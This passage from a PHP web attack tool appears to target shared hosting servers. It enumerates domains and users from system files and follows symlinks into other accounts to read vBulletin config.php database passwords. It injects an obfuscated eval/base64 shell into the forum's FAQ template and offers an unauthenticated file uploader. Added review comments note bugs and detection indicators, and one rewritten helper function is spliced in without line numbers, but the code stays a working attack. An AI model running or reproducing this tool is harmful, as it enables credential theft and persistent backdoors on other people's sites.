  1162.  
  1163. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1164.  
  1165. $con     = @mysql_connect('localhost',$userdb,$pass);
  1166.  
  1167. $db      = @mysql_select_db($db,$con);
  1168.  
  1169. $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1170.  
  1171. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  1172.  
  1173. $crypt .= "$shell";
  1174.  
  1175. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1176.  
  1177. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1178.  
  1179. $query  = @mysql_query($sqlfaq,$con);
  1180.  
  1181.  
  1182.  
  1183. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1184.  
  1185. else
  1186.  
  1187. {
  1188.  
  1189. $r = '<b style="color:red">failed</b>';
  1190.  
  1191. }
  1192.  
  1193. $domins = trim($domin).'';
  1194.  
  1195. echo "<tr>
  1196. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1197. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1198.  
  1199.  
  1200.  
  1201.  
  1202.  
  1203.  
  1204.  
  1205. }else{
  1206.  
  1207. echo "<tr>
  1208. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1209. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1210. }
  1211.  
  1212. }
  1213.  
  1214.  
  1215.  
  1216.  
  1217.  
  1218.  
  1219.  
  1220.  
  1221.  
  1222.  
  1223. die();
  1224.  
  1225. }
  1226.  
  1227. if(!is_file('named.txt')){
  1228.  
  1229. $d00m = file("/etc/named.conf");
  1230.  
  1231. }else{
  1232.  
  1233. $d00m = file("named.txt");
  1234.  
  1235.  
  1236. }
  1237. if(!$d00m)
  1238. {
  1239.  
  1240.                 die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1241. }
  1242. else
  1243.  
  1244. {
  1245. echo "<div class='tmp'>
  1246. <form method='POST' action='$pg?sws=vb'>
  1247. <input type='submit' value='Inject shell' />
  1248. <input type='hidden' value='1' name='s' />
  1249. </form>
  1250. <br /><br />
  1251. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1252.  
  1253. $f = fopen('vb.txt','w');
  1254.  
  1255. foreach($d00m as $dom){
  1256.  
  1257. if(eregi("zone",$dom)){
  1258.  
  1259. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1260.  
  1261. if(strlen(trim($domsws[1][0])) > 2){
  1262.  
  1263. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1264.  
  1265. ///////////////////////////////////////////////////////////////////////////////////
  1266.  
  1267. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1268. $wpp=get_headers($wpl);
  1269. $wp=$wpp[0];
  1270.  
  1271. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1272. $wpp2=get_headers($wp2);
  1273. $wp12=$wpp2[0];
  1274.  
  1275. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1276. $wpp3=get_headers($wp3);
  1277. $wp13=$wpp3[0];
  1278.  
  1279.  
  1280.  ////////// vb ////////////
  1281.  
  1282. $pos = strpos($wp, "200");
  1283. $config="&nbsp;";
  1284.  
  1285. if (strpos($wp, "200") == true )
  1286. {
  1287.  $config= $wpl;
  1288. }
  1289. elseif (strpos($wp12, "200") == true)
  1290. {
  1291.   $config= $wp2;
  1292. }
  1293. elseif (strpos($wp13, "200") == true)
  1294. {
  1295.   $config= $wp3;
  1296. }
  1297. else
  1298. {
  1299. continue;
  1300.  
  1301. }
  1302. flush();
  1303.  
  1304. /////////////////////////////////////////////////////////////////////////////////////
  1305.  
  1306. $dom = $domsws[1][0];
  1307.  
  1308. $w = fwrite($f,"$config||$dom \n");
  1309. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1310.  
  1311.  
  1312. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1313. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319. flush();
  1320.  
  1321.  
  1322. }
  1323. }
  1324. }
  1325. }
  1326.  
  1327.  
  1328.  
  1329.  
  1330.  
  1331.  
  1332.  
  1333.  
  1334. break;
  1335.  
  1336. case 'help':
  1337. // 'help' view: prints a two-column table reporting the runtime conditions this tool checks for.
  1338. echo "<div class='tmp'>
  1339. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1340. // Row 1: ini_get('safe_mode'). A truthy value is shown as red "False", anything else as "True".
  1341. // safe_mode was removed in PHP 5.4; on later runtimes ini_get() returns false and the row reads "True".
  1342. $safe_mode = ini_get('safe_mode');
  1343.      if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1344.  
  1345. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1346. // Rows 2-5: function_exists() for symlink, file, file_get_contents and mkdir ("True" = defined).
  1347. $fun = function_exists('symlink');
  1348.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1349.  
  1350. echo "<tr><td>function symlink</td><td>$r</td>";
  1351. // Defender note: a host that does not need symlink() can list it in disable_functions; Apache's
  1352. // SymLinksIfOwnerMatch (instead of FollowSymLinks) reduces, but per Apache's docs does not fully prevent, cross-user link following.
  1353. $fun = function_exists('file');
  1354.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1355.  
  1356. echo "<tr><td>function file</td><td>$r</td>";
  1357.  
  1358. $fun = function_exists('file_get_contents');
  1359.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1360.  
  1361. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1362.  
  1363. $fun = function_exists('mkdir');
  1364.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1365.  
  1366. echo "<tr><td>function mkdir</td><td>$r</td>";
  1367. // Row 6 is labelled "Permission denied" but the test is is_dir('sym/root'): "True" means that relative path exists.
  1368. // For triage: a sym/ directory with a root entry inside a web root is an indicator worth searching for.
  1369. $fun = is_dir('sym/root');
  1370.      if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1371.  
  1372. echo "<tr><td>Permission denied</td><td>$r</td>";
  1373. // Row 7: NOTE(review): preg_match() is handed the boolean result of the `or` expression, not the
  1374. // content that was read, so this row does not reflect an actual "Forbidden" response.
  1375. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1376.      if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1377.  
  1378. echo "<tr><td>Forbidden</td><td>$r</td>";
  1379.  
  1380.  
  1381.  
  1382.  
  1383. echo "</table></div>";
  1384.  
  1385.  
  1386.  
  1387. break;
  1388. default:
  1389. header("Location: $pg");
  1390.  
  1391.  
  1392.  
  1393.  
  1394. }
  1395.  
  1396.  
  1397. /// home ///
  1398. }else
  1399. {
  1400.  
  1401. // Landing view: an upload form and its handler. No authentication or file-type check is visible in this branch.
  1402. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1403. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1404. if( $_POST['_upl'] == "Upload" ) {
  1405.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1406.     else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1407. // copy() writes the temp file to the client-supplied name as a relative path; neither name nor extension is validated, and @ hides errors.
  1408. // Detection: a multipart POST carrying _upl=Upload with a "file" part, typically followed by a new file appearing beside this script.
  1409. }
  1410.  
  1411.     echo '
  1412. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1413. <br /><br />
  1414. <b style="color: red";>   Sec-w.Com  </b>
  1415. <br /><br />
  1416. Muslims Hackers</div> ';
  1417.  
  1418. }
  1419.  
  1420.  
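  /**
   * Return the part of $text that lies between the first occurrence of $a
   * and the next occurrence of $b after it.
   *
   * If $b does not occur after $a, everything up to the next $a (or the end
   * of the text) is returned. If $a does not occur at all, or either
   * delimiter is empty, an empty string is returned instead of indexing a
   * missing array element.
   *
   * @param string $text Text to search.
   * @param string $a    Opening delimiter.
   * @param string $b    Closing delimiter.
   * @return string The extracted substring, or '' when nothing matches.
   */
  function ex($text,$a,$b){
      $text = (string) $text;
      $a = (string) $a;
      $b = (string) $b;

      // explode() rejects an empty delimiter (a ValueError on PHP 8), so treat it as "no match".
      if ($a === '' || $b === '') {
          return '';
      }

      $parts = explode($a, $text);

      // The original indexed [1] unconditionally; without the opening delimiter that element does not exist.
      if (!isset($parts[1])) {
          return '';
      }

      $inner = explode($b, $parts[1]);
      return $inner[0];
  }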
  1426.  
  1427. // Page footer. Both links use color #F4F4F4, the same value the stylesheet sets as the body background,
  1428. // so they are not visible to a viewer; the "???????" text looks like mis-encoded characters from the paste.
  1429. echo '</div>
  1430.  
  1431. <a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
  1432.  
  1433. <a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
  1434.  
  1435.  
  1436.  
  1437. </body>
  1438.  
  1439. </html>
  1440. ';
  1441.  
  1442. ?>